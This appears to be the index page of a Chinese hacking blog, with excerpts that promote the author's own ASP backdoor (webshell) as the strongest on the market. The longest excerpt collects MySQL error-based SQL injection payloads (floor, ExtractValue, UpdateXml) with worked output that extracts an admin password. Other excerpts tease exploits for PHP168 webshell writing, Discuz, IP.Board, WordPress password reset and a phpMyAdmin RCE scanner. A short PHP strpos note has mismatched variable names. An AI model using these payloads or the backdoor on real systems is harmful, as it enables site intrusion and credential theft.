导航

心动吧黑客BLOG

自发研究:须要多维思想而且要想不可能为可能的人才能做到

[置顶] [原创]心动吧数据库防下载小工具

 这一个文章和我以前发布的一个文章正好成了一个对比(文章连接),如果上一次是茅。那么此次这个就是盾了.为什么这样说?请看一下上一篇的文章。因为上一次是直接修改数据库的防下载表而不会造成数据沉淀在数据库里面。那么换一个思想来讲。假设在数据库当中并没有这一个防下载表。但是却有防下载功能。

例图:

[置顶] 心动吧警告:除20080508外并未发布其他版本

 先要在此感谢evil的提醒,昨天(2009-3-11)时上网后。发现网上有很多新版本的SHELL发布。而且还声称是终结版(我自己都没把自己终结。倒被你终结了).而且采用了加密手段。。现在我将下载回来程序。。打开并分析一下。现在把报告给大家。请慎重使用。。。。

[置顶] [原创]2009-1-18发布新版◆心动吧asp在线◆

心动吧asp在线-不加密加强版-是市面上目前功能最强的.速度最好的一款asp后门

 此内部版修正了:关于无端口的sql连接出错.通用三种SQL连接方式

总收集:mysql ,floor,ExtractValue,UpdateXml三种报错模式注入利用方法

 明生注:如果经常安检某个站点。肯定会遇到报错的,所以收集一些关于报错注入的文章,也促进学习

 

1、通过floor报错

可以通过如下一些利用代码

and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

and (select count(*) from (select 1 union select null union select  !1)x group by concat((select table_name from information_schema.tables  limit 1),floor(rand(0)*2)));

举例如下:
首先进行正常查询:

mysql> select * from article where id = 1;
+—-+——-+———+
| id | title | content |
+—-+——-+———+
|  1 | test  | do it   |
+—-+——-+———+

假如id输入存在注入的话,可以通过如下语句进行报错。

mysql> select * from article where id = 1 and (select 1 from  (select count(*),concat(version(),floor(rand(0)*2))x from  information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry ’5.1.33-community-log1′ for key ’group_key’

可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。
例如我们需要查询管理员用户名和密码:

Method1:

mysql> select * from article where id = 1 and (select 1 from  (select count(*),concat((select pass from admin where id  =1),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’

Method2:

mysql> select * from article where id = 1 and (select count(*)  from (select 1 union select null union select !1)x group by  concat((select pass from admin limit 1),floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’

2、ExtractValue
测试语句如下

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

实际测试过程

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));–
ERROR 1105 (HY000): XPATH syntax error: ’\admin888′

3、UpdateXml

php搜索字符串使用与缺点(strpos)

明生注:由于在编写过程中发现strpos的一个挺大的缺点。。所以做一下笔录。。

    首先我们先看看strpos的作用在于对某一个字符串进行判断是否存在某一个单个或多个字符的函数..看事例

$strpos1 = "这是母字符串"; $strpos2 = "母"; if (strpos($str1,$str2)===false)//这里要注意第一个匹配 { //不存在 }else{ //能用ELSE就不用IF //存在 }

上面的事例可以看出来。从“这是母字符串”中搜索是否存在“母”字。而此时因为在第三位出现。所以会返回真

但如果我们将要判断的字符串换成“这”那么此时因为有第1位出现。而php的判断则是为0。所以当我们判断“这”的字符串出现的时候会出现不存在的原因就在这里。

PHP中文件读写操作

明生KISS注:此文章看着不错所以转来。方便查阅

刚开始学,有点涩,有点不太明白。就以记忆为主。在多加自己操作增加理解,直到有一天融会贯通 。

以下为文件读写操作的 基本PHP函数及模式(看不明白就记住他)

关于模式:

'r' - 只读方式打开, 文件指针置于文件头

'r+' - 读写方式打开,文件指针

.....

中易广告联盟系统(ZYADS) sql注入和本地包含漏洞

中易广告联盟系统(ZYADS) sql注入和本地包含漏洞在index/news.php 1-31行 

<?

include_once("top.php");



      $newsid = intval($_GET['id']);

     

....

PHP168 6.0及以下版本漏洞

危险等级:高

影响版本:PHP168 6.0以下版本

入侵者可以在用户登陆页面构造特殊语句,将PHP一句话写入cache目录,从而获得使用PHP168整站程序网站的WEBSHELL权限。

......

Discuz! Plugin Crazy Star < = 2.0 Sql injection Vulnerability

[+] Founded : ZhaoHuAn

[+] Contact : ZhengXing[at]shandagames[dot]com

[+] Blog : http://www.patching.net/zhaohuan/

[+] Date : August, 26th 2009 [Double Seventh Festival]

Invision Power Board Blind SQL Injection Vulnerability

Invision Power Services IP.Board is a widely used forum available for download or as part of a fully managed hosted community package. IP.Board version 3.0.2 has been found to contain vulnerabilities in its search engine and lost password recovery engine that allows remote attackers to utilize Blind SQL injection. Thus a remote unauthenticated attacker is able to manipulate the database and fetch sensitive information, for example; admin credentials.

...

WordPress < = 2.8.3 Remote admin reset password

# 鬼仔:可以直接重置管理员的密码,但是无法获得重置后的密码,因为重置后的密码是发到管理员信箱的,除非你把管理员的信箱也拿到。WordPress 的 trac 上也已经发了修复的信息Changeset [11797] - Changeset [11804] 。在用 WordPress 的同学来这里下载 wp-login.php 覆盖一下吧。ps:我今天下午就被某人日了一下,密码被重置,发到我邮箱了

pmaPWN! - phpMyAdmin Code Injection RCE Scanner & Exploit

<?php $list = array( '/phpmyadmin/', '/phpMyAdmin/', '/PMA/', '/pma/', '/admin/', '/dbadmin/', '/mysql/', '/myadmin/', '/phpmyadmin2/', '/phpMyAdmin2/', '/phpMyAdmin-2/', '/ph

....

乘风多用户PHP统计系统 v4.0 注射漏洞

明生注:作者不知道是谁。。。。。

今天看东西看累了,就随便下载了这样的一套代码。

大家可以看下他的说明,号称完全防注入攻击,密码32位Md5加密。

看了一下大部分注射是基本不可能了,除非对方漏写东西。

分页:[«]1[2][3][4][5][»]

日历

<< 2013-5 >>

Sun

Mon

Tue

Wed

Thu

Fri

Sat

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

站内搜索

Copyright ⊙ 2004-2009 心动吧 UrL:ABCXD.CoM All RiGhts Reserved